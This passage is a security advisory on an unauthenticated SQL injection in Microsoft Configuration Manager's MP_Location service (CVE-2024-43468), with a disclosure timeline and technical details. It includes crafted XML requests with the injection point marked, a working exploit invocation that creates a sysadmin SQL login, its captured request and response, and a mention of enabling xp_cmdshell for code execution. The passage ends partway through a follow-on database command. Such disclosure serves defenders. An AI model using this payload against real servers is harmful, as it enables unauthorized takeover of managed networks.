Microsoft Configuration Manager (ConfigMgr) 2403 Unauthenticated SQL injections 16/01/2025 - Téléchargement Description Presentation Microsoft Configuration Manager (a.k.a. MCM, ConfigMgr, System Center Configuration Manager or SCCM) is a systems management software product developed by Microsoft for managing large groups of computers providing remote control, patch management, software distribution, operating system deployment, and hardware and software inventory management. Issue(s) The MP_Location service processing messages sent by clients unsafely uses inputs for database interrogation. Two distinct SQL injection vectors were therefore identified, none of them requiring authentication. This leads to the execution of arbitrary SQL queries as the SMS service, which has the sysadmin role. Remote code execution can also be achieved by activating the xp_cmdshell procedure. Exploitation code is available at https://github.com/synacktiv/CVE-2024-43468 . Timeline Date Description 2024.08.05 Advisory sent to MSRC 2024.08.22 MSRC confirmed the vulnerability. 2024.09.04 Initial hotfix released by Microsoft 2024.09.05 Hotfix revoked by Microsoft due to an issue 2024.09.18 Hotfix republished by Microsoft 2024.10.08 MSRC disclosed the CVE in October's patch Tuesday 2025.01.16 Public release Technical details Unauthenticated SQL injection with MachineID Description Client messages targeting the MP_Location endpoint are processed by the C:\Program Files\SMS_CCM\LocationMgr.dll library. The CCM::MP::Location::CHandleLocationRequest::getMachineID function defined in the latter calls the MP_GetMachineID procedure on the site database. The variable used to format the query string is not sanitized. Moreover, the variable used as the machine identifier is sourced from the XML documents posted by clients on the HTTP /ccm_system/request endpoint. The latter relies on a protocol that uses the CCM_POST method and a multipart/mixed encoded body with two XML documents: First, a header with the Msg root element. The injection point happens here through the SourceID sub element. <Msg ReplyCompression="zlib" SchemaVersion="1.1"> <Body Type="ByteRange" Length="123" Offset="0" /> <CorrelationID>{{00000000-0000-0000-0000-000000000000}}</CorrelationID> <Hooks> <Hook3 Name="zlib-compress" /> </Hooks> <ID>{{00000000-0000-0000-0000-000000000000}}</ID> <Payload Type="inline"/> <Priority>0</Priority> <Protocol>http</Protocol> <ReplyMode>Sync</ReplyMode> <ReplyTo>direct:dummyEndpoint:LS_ReplyLocations</ReplyTo> <TargetAddress>mp:[http]MP_Location</TargetAddress> <TargetEndpoint>MP_Location</TargetEndpoint> <TargetHost>SCCM-MP.CORP.LOCAL</TargetHost> <Timeout>60000</Timeout> <SourceID>MACHINE_ID_INJECTION_POINT</SourceID> </Msg> Secondly, a Zlib-compressed and Unicode-encoded XML body, which represents the actual request. Here the UpdateSFRequest type has to be used to reach the vulnerable function. <UpdateSFRequest> <Package ID="UID:00000000-0000-0000-0000-000000000000" Version="1"></Package> <ClientLocationInfo> <BoundaryGroups> <BoundaryGroup GroupID="1" GroupGUID="00000000-0000-0000-0000-000000000000" GroupFlag="0"/> </BoundaryGroups> </ClientLocationInfo> </UpdateSFRequest> An unauth_sqli_LocationMgr.py script was put together to exploit this injection. It can be used as follows to execute queries and create a sysadmin user. $ unauth_sqli_LocationMgr.py -t sccm.corp.local -sql "create login poc_sqli_machineid with password = 'p4sswOrd'; exec master.dbo.sp_addsrvrolemember 'poc_sqli_machineid', 'sysadmin'" >>>> Header <<<<< <Msg ReplyCompression="zlib" SchemaVersion="1.1"> <Body Type="ByteRange" Length="556" Offset="0" /> <CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID> <Hooks> <Hook3 Name="zlib-compress" /> </Hooks> <ID>{00000000-0000-0000-0000-000000000000}</ID> <Payload Type="inline"/> <Priority>0</Priority> <Protocol>http</Protocol> <ReplyMode>Sync</ReplyMode> <ReplyTo>direct:dummyEndpoint:LS_ReplyLocations</ReplyTo> <TargetAddress>mp:[http]MP_LocationManager</TargetAddress> <TargetEndpoint>MP_LocationManager</TargetEndpoint> <TargetHost>sccm.corp.local</TargetHost> <Timeout>60000</Timeout> <SourceID>GUID:8796f5b9-fa4b-4609-a49a-66c5a92c875e'; create login poc_sqli_machineid with password = 'p4sswOrd'; exec master.dbo.sp_addsrvrolemember 'poc_sqli_machineid', 'sysadmin' ; select '1 </SourceID> </Msg> >>>> Request <<<<< <UpdateSFRequest> <Package ID="UID:c7763df9-edf0-4cfd-918f-b6960c3a9755" Version="1"></Package> <ClientLocationInfo> <BoundaryGroups> <BoundaryGroup GroupID="1" GroupGUID="00000000-0000-0000-0000-000000000000" GroupFlag="0"/> </BoundaryGroups> </ClientLocationInfo> </UpdateSFRequest> >>>> Response : 200 <<<<< --aAbBcCdDv1234567890VxXyYzZ content-type: text/plain; charset=UTF-16 ÿþNoReply --aAbBcCdDv1234567890VxXyYzZ-- The newly created account gives access to the CM_<SITE_CODE> database of the site. $ sqsh -S sccm-db.corp.local:1433 -U poc_sqli_machineid -P p4sswOrd -m vert -C "select name,sysadmin,h